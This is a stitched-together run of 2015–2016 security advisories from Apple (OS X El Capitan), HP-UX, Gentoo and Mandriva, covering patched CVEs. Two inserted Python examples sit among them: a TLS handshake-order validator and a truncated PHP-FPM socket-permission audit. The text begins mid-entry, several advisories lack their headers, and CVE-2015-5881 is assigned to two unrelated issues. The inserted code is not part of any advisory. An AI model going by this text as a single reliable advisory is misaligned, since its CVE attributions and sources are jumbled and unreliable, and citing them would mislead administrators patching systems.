Description: Apple Ethernet Thunderbolt adapters could modify the
host firmware if connected during an EFI update. This issue was
addressed by not loading option ROMs during updates.
CVE-ID
CVE-2015-5914 : Trammell Hudson of Two Sigma Investments and snare
Finder
Available for: Mac OS X v10.6.8 and later
Impact: The "Secure Empty Trash" feature may not securely delete
files placed in the Trash
Description: An issue existed in guaranteeing secure deletion of
Trash files on some systems, such as those with flash storage. This
issue was addressed by removing the "Secure Empty Trash" option.
CVE-ID
CVE-2015-5901 : Apple
Game Center
Available for: Mac OS X v10.6.8 and later
Impact: A malicious Game Center application may be able to access a
player's email address
Description: An issue existed in Game Center in the handling of a
player's email. This issue was addressed through improved access
restrictions.
CVE-ID
CVE-2015-5855 : Nasser Alnasser
Heimdal
Available for: Mac OS X v10.6.8 and later
Impact: An attacker may be able to replay Kerberos credentials to
the SMB server
Description: An authentication issue existed in Kerberos
credentials. This issue was addressed through additional validation
of credentials using a list of recently seen credentials.
CVE-ID
CVE-2015-5913 : Tarun Chopra of Microsoft Corporation, U.S. and Yu
Fan of Microsoft Corporation, China
ICU
Available for: Mac OS X v10.6.8 and later
Impact: Multiple vulnerabilities in ICU
Description: Multiple vulnerabilities existed in ICU versions prior
to 53.1.0. These issues were addressed by updating ICU to version
55.1.
CVE-ID
CVE-2014-8146
CVE-2014-8147
CVE-2015-5922
Install Framework Legacy
Available for: Mac OS X v10.6.8 and later
Impact: A local user may be able to gain root privileges
Description: A restriction issue existed in the Install private
framework containing a privileged executable. This issue was
addressed by removing the executable.
CVE-ID
CVE-2015-5888 : Apple
Intel Graphics Driver
Available for: Mac OS X v10.6.8 and later
Impact: A local user may be able to execute arbitrary code with
system privileges
Description: Multiple memory corruption issues existed in the Intel
Graphics Driver. These issues were addressed through improved memory
handling.
CVE-ID
CVE-2015-5830 : Yuki MIZUNO (@mzyy94)
CVE-2015-5877 : Camillus Gerard Cai
IOAudioFamily
Available for: Mac OS X v10.6.8 and later
Impact: A local user may be able to determine kernel memory layout
Description: An issue existed in IOAudioFamily that led to the
disclosure of kernel memory content. This issue was addressed by
permuting kernel pointers.
CVE-ID
CVE-2015-5864 : Luca Todesco
IOGraphics
Available for: Mac OS X v10.6.8 and later
Impact: A local user may be able to execute arbitrary code with
kernel privileges
Description: Multiple memory corruption issues existed in the
kernel. These issues were addressed through improved memory handling.
CVE-ID
CVE-2015-5871 : Ilja van Sprundel of IOActive
CVE-2015-5872 : Ilja van Sprundel of IOActive
CVE-2015-5873 : Ilja van Sprundel of IOActive
CVE-2015-5890 : Ilja van Sprundel of IOActive
IOGraphics
Available for: Mac OS X v10.6.8 and later
Impact: A malicious application may be able to determine kernel
memory layout
Description: An issue existed in IOGraphics which could have led to
the disclosure of kernel memory layout. This issue was addressed
through improved memory management.
CVE-ID
CVE-2015-5865 : Luca Todesco
IOHIDFamily
Available for: Mac OS X v10.6.8 and later
Impact: A malicious application may be able to execute arbitrary
code with system privileges
Description: Multiple memory corruption issues existed in
IOHIDFamily. These issues were addressed through improved memory
handling.
CVE-ID
CVE-2015-5866 : Apple
CVE-2015-5867 : moony li of Trend Micro
IOStorageFamily
Available for: Mac OS X v10.6.8 and later
Impact: A local attacker may be able to read kernel memory
Description: A memory initialization issue existed in the kernel.
This issue was addressed through improved memory handling.
CVE-ID
CVE-2015-5863 : Ilja van Sprundel of IOActive
Kernel
Available for: Mac OS X v10.6.8 and later
Impact: A local user may be able to execute arbitrary code with
kernel privileges
Description: Multiple memory corruption issues existed in the
Kernel. These issues were addressed through improved memory handling.
CVE-ID
CVE-2015-5868 : Cererdlong of Alibaba Mobile Security Team
CVE-2015-5896 : Maxime Villard of m00nbsd
CVE-2015-5903 : CESG
Kernel
Available for: Mac OS X v10.6.8 and later
Impact: A local process can modify other processes without
entitlement checks
Description: An issue existed where root processes using the
processor_set_tasks API were allowed to retrieve the task ports of
other processes. This issue was addressed through additional
entitlement checks.
CVE-ID
CVE-2015-5882 : Pedro Vilaca, working from original research by
Ming-chieh Pan and Sung-ting Tsai; Jonathan Levin
Kernel
Available for: Mac OS X v10.6.8 and later
Impact: A local attacker may control the value of stack cookies
Description: Multiple weaknesses existed in the generation of user
space stack cookies. These issues were addressed through improved
generation of stack cookies.
CVE-ID
CVE-2013-3951 : Stefan Esser
Kernel
Available for: Mac OS X v10.6.8 and later
Impact: An attacker may be able to launch denial of service attacks
on targeted TCP connections without knowing the correct sequence
number
Description: An issue existed in xnu's validation of TCP packet
headers. This issue was addressed through improved TCP packet header
validation.
CVE-ID
CVE-2015-5879 : Jonathan Looney
Kernel
Available for: Mac OS X v10.6.8 and later
Impact: An attacker in a local LAN segment may disable IPv6 routing
Description: An insufficient validation issue existed in the
handling of IPv6 router advertisements that allowed an attacker to
set the hop limit to an arbitrary value. This issue was addressed by
enforcing a minimum hop limit.
CVE-ID
CVE-2015-5869 : Dennis Spindel Ljungmark
Kernel
Available for: Mac OS X v10.6.8 and later
Impact: A local user may be able to determine kernel memory layout
Description: An issue existed that led to the disclosure of kernel
memory layout. This was addressed through improved initialization of
kernel memory structures.
CVE-ID
CVE-2015-5842 : beist of grayhash
Kernel
Available for: Mac OS X v10.6.8 and later
Impact: A local user may be able to determine kernel memory layout
Description: An issue existed in debugging interfaces that led to
the disclosure of memory content. This issue was addressed by
sanitizing output from debugging interfaces.
CVE-ID
CVE-2015-5870 : Apple
Kernel
Available for: Mac OS X v10.6.8 and later
Impact: A local user may be able to cause a system denial of service
Description: A state management issue existed in debugging
functionality. This issue was addressed through improved validation.
CVE-ID
CVE-2015-5902 : Sergi Alvarez (pancake) of NowSecure Research Team
libc
Available for: Mac OS X v10.6.8 and later
Impact: A local user may be able to execute arbitrary code with
kernel privileges
Description: A memory corruption issue existed in the kernel. This
issue was addressed through improved memory handling.
CVE-ID
CVE-2014-8611 : Adrian Chadd and Alfred Perlstein of Norse
Corporation
libpthread
Available for: Mac OS X v10.6.8 and later
Impact: A local user may be able to execute arbitrary code with
kernel privileges
Description: A memory corruption issue existed in the kernel. This
issue was addressed through improved memory handling.
CVE-ID
CVE-2015-5899 : Lufeng Li of Qihoo 360 Vulcan Team
libxpc
Available for: Mac OS X v10.6.8 and later
Impact: Many SSH connections could cause a denial of service
Description: launchd had no limit on the number of processes that
could be started by a network connection. This issue was addressed by
limiting the number of SSH processes to 40.
CVE-ID
CVE-2015-5881 : Apple
Login Window
Available for: Mac OS X v10.6.8 and later
Impact: The screen lock may not engage after the specified time
period
Description: An issue existed with captured display locking. The
issue was addressed through improved lock handling.
CVE-ID
CVE-2015-5833 : Carlos Moreira, Rainer Dorau of rainer dorau
informationsdesign, Chris Nehren, Kai Takac, Hans Douma, Toni
Vaahtera, and an anonymous researcher
lukemftpd
Available for: Mac OS X v10.6.8 and later
Impact: A remote attacker may be able to deny service to the FTP
server
Description: A glob-processing issue existed in tnftpd. This issue
was addressed through improved glob validation.
CVE-ID
CVE-2015-5917 : Maksymilian Arciemowicz of cxsecurity.com
Mail
Available for: Mac OS X v10.6.8 and later
Impact: Printing an email may leak sensitive user information
Description: An issue existed in Mail which bypassed user
preferences when printing an email. This issue was addressed through
improved user preference enforcement.
CVE-ID
CVE-2015-5881 : Owen DeLong of Akamai Technologies, Noritaka Kamiya,
Dennis Klein from Eschenburg, Germany, Jeff Hammett of Systim
Technology Partners
Mail
Available for: Mac OS X v10.6.8 and later
Impact: An attacker in a privileged network position may be able to
intercept attachments of S/MIME-encrypted e-mail sent via Mail Drop
Description: An issue existed in handling encryption parameters for
large email attachments sent via Mail Drop. The issue is addressed by
no longer offering Mail Drop when sending an encrypted e-mail.
CVE-ID
CVE-2015-5884 : John McCombs of Integrated Mapping Ltd
Multipeer Connectivity
Available for: Mac OS X v10.6.8 and later
Impact: A local attacker may be able to observe unprotected
multipeer data
Description: An issue existed in convenience initializer handling in
which encryption could be actively downgraded to a non-encrypted
session. This issue was addressed by changing the convenience
initializer to require encryption.
CVE-ID
CVE-2015-5851 : Alban Diquet (@nabla_c0d3) of Data Theorem
NetworkExtension
Available for: Mac OS X v10.6.8 and later
Impact: A malicious application may be able to determine kernel
memory layout
Description: An uninitialized memory issue in the kernel led to the
disclosure of kernel memory content. This issue was addressed through
improved memory initialization.
CVE-ID
CVE-2015-5831 : Maxime Villard of m00nbsd
Notes
Available for: Mac OS X v10.6.8 and later
Impact: A local user may be able to leak sensitive user information
Description: An issue existed in parsing links in the Notes
application. This issue was addressed through improved input
validation.
CVE-ID
CVE-2015-5878 : Craig Young of Tripwire VERT, an anonymous researcher
Notes
Available for: Mac OS X v10.6.8 and later
Impact: A local user may be able to leak sensitive user information
Description: A cross-site scripting issue existed in parsing text by
the Notes application. This issue was addressed through improved
input validation.
CVE-ID
CVE-2015-5875 : xisigr of Tencent's Xuanwu LAB (www.tencent.com)
OpenSSH
Available for: Mac OS X v10.6.8 and later
Impact: Multiple vulnerabilities in OpenSSH
Description: Multiple vulnerabilities existed in OpenSSH versions
prior to 6.9. These issues were addressed by updating OpenSSH to
version 6.9.
CVE-ID
CVE-2014-2532
OpenSSL
Available for: Mac OS X v10.6.8 and later
Impact: Multiple vulnerabilities in OpenSSL
Description: Multiple vulnerabilities existed in OpenSSL versions
prior to 0.9.8zg. These were addressed by updating OpenSSL to version
0.9.8zg.
CVE-ID
CVE-2015-0286
CVE-2015-0287
procmail
Available for: Mac OS X v10.6.8 and later
Impact: Multiple vulnerabilities in procmail
Description: Multiple vulnerabilities existed in procmail versions
prior to 3.22. These issues were addressed by removing procmail.
CVE-ID
CVE-2014-3618
remote_cmds
Available for: Mac OS X v10.6.8 and later
Impact: A local user may be able to execute arbitrary code with root
privileges
Description: An issue existed in the usage of environment variables
by the rsh binary. This issue was addressed by dropping setuid
privileges from the rsh binary.
CVE-ID
CVE-2015-5889 : Philip Pettersson
removefile
Available for: Mac OS X v10.6.8 and later
Impact: Processing malicious data may lead to unexpected application
termination
Description: An overflow fault existed in the checkint division
routines. This issue was addressed with improved division routines.
CVE-ID
CVE-2015-5840 : an anonymous researcher
Ruby
Available for: Mac OS X v10.6.8 and later
Impact: Multiple vulnerabilities in Ruby
Description: Multiple vulnerabilities existed in Ruby versions prior
to 2.0.0p645. These were addressed by updating Ruby to version
2.0.0p645.
CVE-ID
CVE-2014-8080
CVE-2014-8090
CVE-2015-1855
Security
Available for: Mac OS X v10.6.8 and later
Impact: The lock state of the keychain may be incorrectly displayed
to the user
Description: A state management issue existed in the way keychain
lock status was tracked. This issue was addressed through improved
state management.
CVE-ID
CVE-2015-5915 : Peter Walz of University of Minnesota, David Ephron,
Eric E. Lawrence, Apple
Security
Available for: Mac OS X v10.6.8 and later
Impact: A trust evaluation configured to require revocation checking
may succeed even if revocation checking fails
Description: The kSecRevocationRequirePositiveResponse flag was
specified but not implemented. This issue was addressed by
implementing the flag.
CVE-ID
CVE-2015-5894 : Hannes Oud of kWallet GmbH
Security
Available for: Mac OS X v10.6.8 and later
Impact: A remote server may prompt for a certificate before
identifying itself
Description: Secure Transport accepted the CertificateRequest
message before the ServerKeyExchange message. This issue was
addressed by requiring the ServerKeyExchange first.
CVE-ID
CVE-2015-5887 : Benjamin Beurdouche, Karthikeyan Bhargavan, Antoine
Delignat-Lavaud, Alfredo Pironti, and Jean Karim Zinzindohoue of
INRIA Paris-Rocquencourt, and Cedric Fournet and Markulf Kohlweiss of
Microsoft Research, Pierre-Yves Strub of IMDEA Software Institute
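As an added example (not Apple's Secure Transport code and not part of the original advisory), a state-machine check for the TLS 1.2 server flight that enforces the ordering described above: a CertificateRequest is accepted only after the ServerKeyExchange that the negotiated cipher suite requires. Message type codes are RFC 5246's; the key-exchange labels and the sample flights are constructed for the example.

```python
"""Strict ordering check for the TLS 1.2 server handshake flight.

Added example, not Apple's Secure Transport code. It models the server
flight ServerHello, Certificate, [ServerKeyExchange], [CertificateRequest],
ServerHelloDone as a state machine and rejects a CertificateRequest that
arrives before a mandatory ServerKeyExchange, the acceptance the advisory
entry above describes. Message type codes follow RFC 5246 section 7.4.
"""
from typing import Iterable, List

SERVER_HELLO = 2
CERTIFICATE = 11
SERVER_KEY_EXCHANGE = 12
CERTIFICATE_REQUEST = 13
SERVER_HELLO_DONE = 14

NAMES = {
    SERVER_HELLO: "ServerHello",
    CERTIFICATE: "Certificate",
    SERVER_KEY_EXCHANGE: "ServerKeyExchange",
    CERTIFICATE_REQUEST: "CertificateRequest",
    SERVER_HELLO_DONE: "ServerHelloDone",
}

# Position of each message in the flight; every accepted message must
# have a strictly higher rank than the previous one (RFC 5246, 7.3).
RANK = {SERVER_HELLO: 0, CERTIFICATE: 1, SERVER_KEY_EXCHANGE: 2,
        CERTIFICATE_REQUEST: 3, SERVER_HELLO_DONE: 4}

# Key exchange methods (assumed labels) for which ServerKeyExchange is
# mandatory (RFC 5246, 7.4.3); with plain "RSA" it must not be sent.
EPHEMERAL_KX = {"DHE_DSS", "DHE_RSA", "DH_anon",
                "ECDHE_ECDSA", "ECDHE_RSA", "ECDH_anon"}


class HandshakeOrderError(ValueError):
    """Raised when the server flight violates the required message order."""


def validate_server_flight(messages: Iterable[int], key_exchange: str) -> List[str]:
    """Return the accepted message names, or raise HandshakeOrderError.

    messages: handshake type codes in arrival order;
    key_exchange: key exchange method of the negotiated cipher suite.
    """
    needs_ske = key_exchange in EPHEMERAL_KX
    anonymous = key_exchange.endswith("anon")
    accepted: List[str] = []
    seen = set()
    last_rank = -1
    for msg in messages:
        if msg not in RANK:
            raise HandshakeOrderError(f"unexpected handshake type {msg}")
        name = NAMES[msg]
        if SERVER_HELLO_DONE in seen:
            raise HandshakeOrderError(f"{name} after ServerHelloDone")
        if not accepted and msg != SERVER_HELLO:
            raise HandshakeOrderError(f"flight must start with ServerHello, got {name}")
        if RANK[msg] <= last_rank:
            raise HandshakeOrderError(f"{name} out of order after {accepted[-1]}")
        if msg == SERVER_KEY_EXCHANGE and not needs_ske:
            raise HandshakeOrderError(f"ServerKeyExchange not allowed with {key_exchange}")
        if msg == CERTIFICATE_REQUEST and anonymous:
            raise HandshakeOrderError("anonymous server may not request a certificate")
        if msg == CERTIFICATE_REQUEST and needs_ske and SERVER_KEY_EXCHANGE not in seen:
            # The ordering the advisory describes: the client has not yet
            # received the server's key share, so the request is rejected.
            raise HandshakeOrderError("CertificateRequest before mandatory ServerKeyExchange")
        if msg == SERVER_HELLO_DONE:
            if not anonymous and CERTIFICATE not in seen:
                raise HandshakeOrderError("ServerHelloDone without Certificate")
            if needs_ske and SERVER_KEY_EXCHANGE not in seen:
                raise HandshakeOrderError("ServerHelloDone without ServerKeyExchange")
        seen.add(msg)
        last_rank = RANK[msg]
        accepted.append(name)
    if SERVER_HELLO_DONE not in seen:
        raise HandshakeOrderError("flight ended without ServerHelloDone")
    return accepted


def flight_is_valid(messages: Iterable[int], key_exchange: str) -> bool:
    """Boolean wrapper around validate_server_flight for quick checks."""
    try:
        validate_server_flight(list(messages), key_exchange)
        return True
    except HandshakeOrderError:
        return False


if __name__ == "__main__":
    # Constructed flights: a well-formed one and one with the request reordered.
    good = [SERVER_HELLO, CERTIFICATE, SERVER_KEY_EXCHANGE,
            CERTIFICATE_REQUEST, SERVER_HELLO_DONE]
    bad = [SERVER_HELLO, CERTIFICATE, CERTIFICATE_REQUEST,
           SERVER_KEY_EXCHANGE, SERVER_HELLO_DONE]
    print(validate_server_flight(good, "ECDHE_RSA"))
    print(flight_is_valid(bad, "ECDHE_RSA"))  # False
```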
SMB
Available for: Mac OS X v10.6.8 and later
Impact: A local user may be able to execute arbitrary code with
kernel privileges
Description: A memory corruption issue existed in the kernel. This
issue was addressed through improved memory handling.
CVE-ID
CVE-2015-5891 : Ilja van Sprundel of IOActive
SMB
Available for: Mac OS X v10.6.8 and later
Impact: A local user may be able to determine kernel memory layout
Description: An issue existed in SMBClient that led to the
disclosure of kernel memory content. This issue was addressed through
improved bounds checking.
CVE-ID
CVE-2015-5893 : Ilja van Sprundel of IOActive
SQLite
Available for: Mac OS X v10.6.8 and later
Impact: Multiple vulnerabilities in SQLite v3.8.5
Description: Multiple vulnerabilities existed in SQLite v3.8.5.
These issues were addressed by updating SQLite to version 3.8.10.2.
CVE-ID
CVE-2015-3414
CVE-2015-3415
CVE-2015-3416
Telephony
Available for: Mac OS X v10.6.8 and later
Impact: A local attacker can place phone calls without the user's
knowledge when using Continuity
Description: An issue existed in the authorization checks for
placing phone calls. This issue was addressed through improved
authorization checks.
CVE-ID
CVE-2015-3785 : Dan Bastone of Gotham Digital Science
Terminal
Available for: Mac OS X v10.6.8 and later
Impact: Maliciously crafted text could mislead the user in Terminal
Description: Terminal did not handle bidirectional override
characters in the same way when displaying text and when selecting
text. This issue was addressed by suppressing bidirectional override
characters in Terminal.
CVE-ID
CVE-2015-5883 : an anonymous researcher
tidy
Available for: Mac OS X v10.6.8 and later
Impact: Visiting a maliciously crafted website may lead to arbitrary
code execution
Description: Multiple memory corruption issues existed in tidy.
These issues were addressed through improved memory handling.
CVE-ID
CVE-2015-5522 : Fernando Munoz of NULLGroup.com
CVE-2015-5523 : Fernando Munoz of NULLGroup.com
Time Machine
Available for: Mac OS X v10.6.8 and later
Impact: A local attacker may gain access to keychain items
Description: An issue existed in backups by the Time Machine
framework. This issue was addressed through improved coverage of Time
Machine backups.
CVE-ID
CVE-2015-5854 : Jonas Magazinius of Assured AB
Note: OS X El Capitan 10.11 includes the security content of
Safari 9: https://support.apple.com/kb/HT205265.
OS X El Capitan 10.11 may be obtained from the Mac App Store:
http://www.apple.com/support/downloads/
Information will also be posted to the Apple Security Updates
web site: https://support.apple.com/kb/HT201222
This message is signed with Apple's Product Security PGP key,
and details are available at:
https://www.apple.com/support/security/pgp/
Release Date: 2015-06-10
Last Updated: 2015-06-10
Potential Security Impact: Remote denial of service (DoS), man-in-the-middle
(MitM) attack, modification of data, local modification of data
Source: Hewlett-Packard Company, HP Software Security Response Team
VULNERABILITY SUMMARY
Potential security vulnerabilities have been identified with the HP-UX Apache
Web Server Suite, Tomcat Servlet Engine, and PHP. These could be exploited
remotely to create a Denial of Service (DoS) and other vulnerabilities.
HP-UX B.11.31 running HP-UX Apache Web Server Suite v4.04 or earlier
HP-UX B.11.31 running HP-UX Apache Web Server v2.2.15.22 or earlier
HP-UX B.11.31 running Tomcat Servlet Engine v6.0.39.03 or earlier
HP-UX B.11.31 running PHP v5.4.11.04 or earlier
BACKGROUND
CVSS 2.0 Base Metrics
===========================================================
Reference Base Vector Base Score
CVE-2013-5704 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0
CVE-2014-0118 (AV:N/AC:M/Au:N/C:N/I:N/A:P) 4.3
CVE-2014-0226 (AV:N/AC:M/Au:N/C:P/I:P/A:P) 6.8
CVE-2014-0227 (AV:N/AC:L/Au:N/C:N/I:P/A:P) 6.4
CVE-2014-0231 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0
CVE-2014-8142 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5
CVE-2014-9709 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0
CVE-2015-0231 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5
CVE-2015-0273 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5
CVE-2015-1352 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0
CVE-2015-2301 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5
CVE-2015-2305 (AV:N/AC:M/Au:N/C:P/I:P/A:P) 6.8
CVE-2015-2331 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5
CVE-2015-2783 (AV:N/AC:M/Au:N/C:P/I:N/A:P) 5.8
===========================================================
Information on CVSS is documented
in HP Customer Notice: HPSN-2008-002
RESOLUTION
HP has provided the following software updates to resolve the
vulnerabilities.
The updates are available for download from http://software.hp.com
NOTE: HP-UX Web Server Suite v4.05 HPUXWSATW405 contains Apache v2.2.29.01,
Tomcat Servlet Engine 6.0.43.01, PHP 5.4.40.01, and Webmin v1.070.13
HP-UX 11i Release          Apache Depot name
B.11.31 (11i v3 32-bit)    HP_UX_11.31_HPUXWS22ATW-B405-11-31-64.depot
B.11.31 (11i v3 64-bit)    HP_UX_11.31_HPUXWS22ATW-B405-11-31-64.depot
MANUAL ACTIONS: Yes - Update
Install HP-UX Web Server Suite v4.05 or subsequent
PRODUCT SPECIFIC INFORMATION
HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application
that replaces HP-UX Security Patch Check. It analyzes all Security Bulletins
issued by HP and lists recommended actions that may apply to a specific HP-UX
system. It can also download patches and create a depot automatically. For
more information see https://www.hp.com/go/swa
The following text is for use by the HP-UX Software Assistant.
AFFECTED VERSIONS
HP-UX B.11.31
==================
hpuxws22APCH32.APACHE
hpuxws22APCH32.APACHE2
hpuxws22APCH32.AUTH_LDAP
hpuxws22APCH32.AUTH_LDAP2
hpuxws22APCH32.MOD_JK
hpuxws22APCH32.MOD_JK2
hpuxws22APCH32.MOD_PERL
hpuxws22APCH32.MOD_PERL2
hpuxws22APCH32.PHP
hpuxws22APCH32.PHP2
hpuxws22APCH32.WEBPROXY
hpuxws22APCH32.WEBPROXY2
hpuxws22APACHE.APACHE
hpuxws22APACHE.APACHE2
hpuxws22APACHE.AUTH_LDAP
hpuxws22APACHE.AUTH_LDAP2
hpuxws22APACHE.MOD_JK
hpuxws22APACHE.MOD_JK2
hpuxws22APACHE.MOD_PERL
hpuxws22APACHE.MOD_PERL2
hpuxws22APACHE.PHP
hpuxws22APACHE.PHP2
hpuxws22APACHE.WEBPROXY
hpuxws22APACHE.WEBPROXY2
action: install revision B.2.2.29.01 or subsequent
hpuxws22TOMCAT.TOMCAT
action: install revision C.6.0.43.01 or subsequent
END AFFECTED VERSIONS
HISTORY
Version:1 (rev.1) - 10 June 2015 Initial release
Third Party Security Patches: Third party security patches that are to be
installed on systems running HP software products should be applied in
accordance with the customer's patch management policy.
Support: For issues about implementing the recommendations of this Security
Bulletin, contact normal HP Services support channel. For other issues about
the content of this Security Bulletin, send e-mail to security-alert@hp.com.
Report: To report a potential security vulnerability with any HP supported
product, send Email to: security-alert@hp.com
Subscribe: To initiate a subscription to receive future HP Security Bulletin
alerts via Email:
http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins
Security Bulletin Archive: A list of recently released Security Bulletins is
available here:
https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/
Software Product Category: The Software Product Category is represented in
the title by the two characters following HPSB.
3C = 3COM
3P = 3rd Party Software
GN = HP General Software
HF = HP Hardware and Firmware
MP = MPE/iX
MU = Multi-Platform Software
NS = NonStop Servers
OV = OpenVMS
PI = Printing and Imaging
PV = ProCurve
ST = Storage Software
TU = Tru64 UNIX
UX = HP-UX
Copyright 2015 Hewlett-Packard Development Company, L.P.
Hewlett-Packard Company shall not be liable for technical or editorial errors
or omissions contained herein. The information provided is provided "as is"
without warranty of any kind. To the extent permitted by law, neither HP or
its affiliates, subcontractors or suppliers will be liable for
incidental, special or consequential damages including downtime cost; lost
profits; damages relating to the procurement of substitute products or
services; or damages for loss of data, or software restoration. The
information in this document is subject to change without notice.
Hewlett-Packard Company and the names of Hewlett-Packard products referenced
herein are trademarks of Hewlett-Packard Company in the United States and
other countries. Other product and company names mentioned herein may be
trademarks of their respective owners.
Background
==========
PHP is a widely-used general-purpose scripting language that is
especially suited for Web development and can be embedded into HTML. Please review the
CVE identifiers referenced below for details.
Workaround
==========
There is no known workaround at this time.
Resolution
==========
All PHP 5.4 users should upgrade to the latest 5.5 stable branch, as
PHP 5.4 is now masked in Portage:
# emerge --sync
# emerge --ask --oneshot --verbose ">=dev-lang/php-5.5.33"
All PHP 5.5 users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=dev-lang/php-5.5.33"
All PHP 5.6 users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=dev-lang/php-5.6.19"
References
==========
[ 1 ] CVE-2013-6501
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-6501
[ 2 ] CVE-2014-9705
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-9705
[ 3 ] CVE-2014-9709
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-9709
[ 4 ] CVE-2015-0231
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0231
[ 5 ] CVE-2015-0273
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0273
[ 6 ] CVE-2015-1351
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-1351
[ 7 ] CVE-2015-1352
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-1352
[ 8 ] CVE-2015-2301
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-2301
[ 9 ] CVE-2015-2348
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-2348
[ 10 ] CVE-2015-2783
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-2783
[ 11 ] CVE-2015-2787
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-2787
[ 12 ] CVE-2015-3329
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-3329
[ 13 ] CVE-2015-3330
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-3330
[ 14 ] CVE-2015-4021
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4021
[ 15 ] CVE-2015-4022
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4022
[ 16 ] CVE-2015-4025
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4025
[ 17 ] CVE-2015-4026
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4026
[ 18 ] CVE-2015-4147
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4147
[ 19 ] CVE-2015-4148
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4148
[ 20 ] CVE-2015-4642
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4642
[ 21 ] CVE-2015-4643
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4643
[ 22 ] CVE-2015-4644
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4644
[ 23 ] CVE-2015-6831
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-6831
[ 24 ] CVE-2015-6832
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-6832
[ 25 ] CVE-2015-6833
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-6833
[ 26 ] CVE-2015-6834
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-6834
[ 27 ] CVE-2015-6835
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-6835
[ 28 ] CVE-2015-6836
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-6836
[ 29 ] CVE-2015-6837
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-6837
[ 30 ] CVE-2015-6838
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-6838
[ 31 ] CVE-2015-7803
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7803
[ 32 ] CVE-2015-7804
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7804
Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
https://security.gentoo.org/glsa/201606-10
Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.
License
=======
Copyright 2016 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
_______________________________________________________________________
Mandriva Linux Security Advisory MDVSA-2015:080
http://www.mandriva.com/en/support/security/
_______________________________________________________________________
Package : php
Date : March 28, 2015
Affected: Business Server 2.0
_______________________________________________________________________
Problem Description:
Multiple vulnerabilities have been discovered and corrected in php:
It was discovered that the file utility contains a flaw in the handling
of indirect magic rules in the libmagic library, which leads to an
infinite recursion when trying to determine the file type of certain
files (CVE-2014-1943).
A flaw was found in the way the file utility determined the type of
Portable Executable (PE) format files, the executable format used on
Windows. A malicious PE file could cause the file utility to crash or,
potentially, execute arbitrary code (CVE-2014-2270).
The BEGIN regular expression in the awk script detector in
magic/Magdir/commands in file before 5.15 uses multiple wildcards
with unlimited repetitions, which allows context-dependent attackers
to cause a denial of service (CPU consumption) via a crafted ASCII
file that triggers a large amount of backtracking, as demonstrated
via a file with many newline characters (CVE-2013-7345).
PHP FPM in PHP versions before 5.4.28 and 5.5.12 uses a UNIX domain
socket with world-writable permissions by default, which allows any
local user to connect to it and execute PHP scripts as the apache user
(CVE-2014-0185).
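CVE-2014-0185 above is a permissions defect rather than a parsing bug, so the practical check is on the pool file and on the socket PHP-FPM actually creates. The audit script below is an added example written for this page, not code from Mandriva or the PHP project. It relies on the standard php-fpm pool directives listen, listen.owner, listen.group and listen.mode; the pool files it scans are constructed for the example.

```python
import os
import re
import stat

# Constructed sample pool files (not copied from any real host).
WEAK_POOL = """
[www]
user = apache
group = apache
listen = /var/run/php-fpm/www.sock
; no listen.owner / listen.group / listen.mode: PHP-FPM builds before
; 5.4.28 / 5.5.12 created this socket with mode 0666
"""

HARDENED_POOL = """
[www]
user = apache
group = apache
listen = /var/run/php-fpm/www.sock
listen.owner = apache
listen.group = apache
listen.mode = 0660
"""

TCP_POOL = """
[api]
listen = 127.0.0.1:9000
"""


def parse_pool(text):
    """Parse php-fpm pool directives into {pool_name: {directive: value}}."""
    pools, current = {}, None
    for raw in text.splitlines():
        line = raw.split(';', 1)[0].strip()  # ';' starts a comment
        if not line:
            continue
        section = re.match(r'^\[(.+)\]$', line)
        if section:
            current = section.group(1)
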